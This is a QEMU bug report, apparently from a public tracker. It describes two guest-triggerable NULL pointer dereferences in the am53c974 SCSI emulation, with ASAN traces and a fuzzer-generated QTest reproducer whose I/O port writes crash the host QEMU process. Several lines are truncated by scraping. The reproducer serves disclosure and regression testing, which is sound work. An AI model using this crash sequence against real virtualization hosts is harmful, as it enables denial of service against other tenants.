NULL pointer dereference issues in am53c974 SCSI host bus adapter
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
QEMU |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Two NULL pointer dereference issues were found in the am53c974 SCSI host bus adapter emulation of QEMU. They could occur while handling the 'Information Transfer' command (CMD_TI) in function handle_ti() in hw/scsi/esp.c, and could be abused by a malicious guest to crash the QEMU process on the host resulting in a denial of service.
Both issues were reported by Cheolwoo Myung (Seoul National University). To reproduce them, configure and run QEMU as follows. Please find attached the required disk images.
$ ./configure --target-
$ make
$ ./qemu-
-device am53c974,id=scsi -device scsi-hd,
-drive id=SysDisk,
Additional info:
RHBZ: https:/
RHBZ: https:/
ASAN logs:
==672133==
hw/scsi/
AddressSanitize
=======
==672133==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000171 (pc 0x55bd63e20b85 bp 0x7f4b6fffdfa0 sp 0x7f4b6fffdf70 T7)
==672133==The signal is caused by a READ memory access.
==672133==Hint: address points to the zero page.
#0 0x55bd63e20b85 in scsi_req_continue hw/scsi/
#1 0x55bd63ab34fb in esp_do_dma hw/scsi/esp.c:453
#2 0x55bd63ab4b3c in handle_ti hw/scsi/esp.c:549
#3 0x55bd63ab72a9 in esp_reg_write hw/scsi/esp.c:691
#4 0x55bd63d7b5dd in esp_pci_io_write hw/scsi/
#5 0x55bd645d55a3 in memory_
#6 0x55bd645d5a24 in access_
#7 0x55bd645e2baa in memory_
#8 0x55bd646b75ff in flatview_
#9 0x55bd646b79d1 in flatview_write softmmu/
#10 0x55bd646b8341 in address_space_write softmmu/
#11 0x55bd646b83f9 in address_space_rw softmmu/
#12 0x55bd648c4736 in kvm_handle_io accel/kvm/
#13 0x55bd648c69c8 in kvm_cpu_exec accel/kvm/
#14 0x55bd647b2413 in kvm_vcpu_thread_fn accel/kvm/
#15 0x55bd64f560de in qemu_thread_start util/qemu-
#16 0x7f4b981763f8 in start_thread (/lib64/
#17 0x7f4b980a3902 in __GI___clone (/lib64/
---
==672020==
hw/scsi/
AddressSanitize
=======
==672020==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000098 (pc 0x559bc99946fd bp 0x7f08bd737fb0 sp 0x7f08bd737f70 T7)
==672020==The signal is caused by a READ memory access.
==672020==Hint: address points to the zero page.
#0 0x559bc99946fd in do_busid_cmd hw/scsi/esp.c:196
#1 0x559bc9994e71 in do_cmd hw/scsi/esp.c:220
#2 0x559bc999ae81 in handle_ti hw/scsi/esp.c:555
#3 0x559bc999d2a9 in esp_reg_write hw/scsi/esp.c:691
#4 0x559bc9c615dd in esp_pci_io_write hw/scsi/
#5 0x559bca4bb5a3 in memory_
#6 0x559bca4bba24 in access_
#7 0x559bca4c8baa in memory_
#8 0x559bca59d5ff in flatview_
#9 0x559bca59d9d1 in flatview_write softmmu/
#10 0x559bca59e341 in address_space_write softmmu/
#11 0x559bca59e3f9 in address_space_rw softmmu/
#12 0x559bca7aa736 in kvm_handle_io accel/kvm/
#13 0x559bca7ac9c8 in kvm_cpu_exec accel/kvm/
#14 0x559bca698413 in kvm_vcpu_thread_fn accel/kvm/
#15 0x559bcae3c0de in qemu_thread_start util/qemu-
#16 0x7f08e57ba3f8 in start_thread (/lib64/
#17 0x7f08e56e7902 in __GI___clone (/lib64/
CVE References
Changed in qemu: | |
status: | Fix Released → Fix Committed |
tags: | removed: qemu |
Changed in qemu: | |
status: | Fix Committed → Fix Released |
QTest Reproducer for the first:
/*
* Autogenerated Fuzzer Test Case
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
* See the COPYING file in the top-level directory.
*/
#include "qemu/osdep.h"
#include "libqos/libqtest.h"
/* if=none, file=null- co://,format= raw -nodefaults -qtest stdio
"scsi- hd,drive= disk0 -drive "
"id=disk0, if=none, file=null- co://,format= raw -nodefaults"); bufwrite( s, 0x0, "\x41", 0x1);
* cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest, -m \
* 512M -device am53c974,id=scsi -device scsi-hd,drive=disk0 -drive \
* id=disk0,
* outl 0xcf8 0x80001010
* outl 0xcfc 0xc000
* outl 0xcf8 0x80001004
* outw 0xcfc 0x05
* outb 0xc046 0x02
* outl 0xc00b 0xc100
* outl 0xc040 0x03
* outl 0xc040 0x03
* write 0x0 0x1 0x41
* outl 0xc00b 0xc100
* outw 0xc040 0x02
* outw 0xc040 0x81
* outl 0xc00b 0x9000
* EOF
*/
static void test_fuzz(void)
{
QTestState *s = qtest_init(
"-display none , -m 512M -device am53c974,id=scsi -device "
qtest_outl(s, 0xcf8, 0x80001010);
qtest_outl(s, 0xcfc, 0xc000);
qtest_outl(s, 0xcf8, 0x80001004);
qtest_outw(s, 0xcfc, 0x05);
qtest_outb(s, 0xc046, 0x02);
qtest_outl(s, 0xc00b, 0xc100);
qtest_outl(s, 0xc040, 0x03);
qtest_outl(s, 0xc040, 0x03);
qtest_
qtest_outl(s, 0xc00b, 0xc100);
qtest_outw(s, 0xc040, 0x02);
qtest_outw(s, 0xc040, 0x81);
qtest_outl(s, 0xc00b, 0x9000);
qtest_quit(s);
}
int main(int argc, char **argv)
{
const char *arch = qtest_get_arch();
g_test_ init(&argc, &argv, NULL);
if (strcmp(arch, "i386") == 0) {
qtest_ add_func( "fuzz/test_ fuzz", test_fuzz);
}
return g_test_run();
}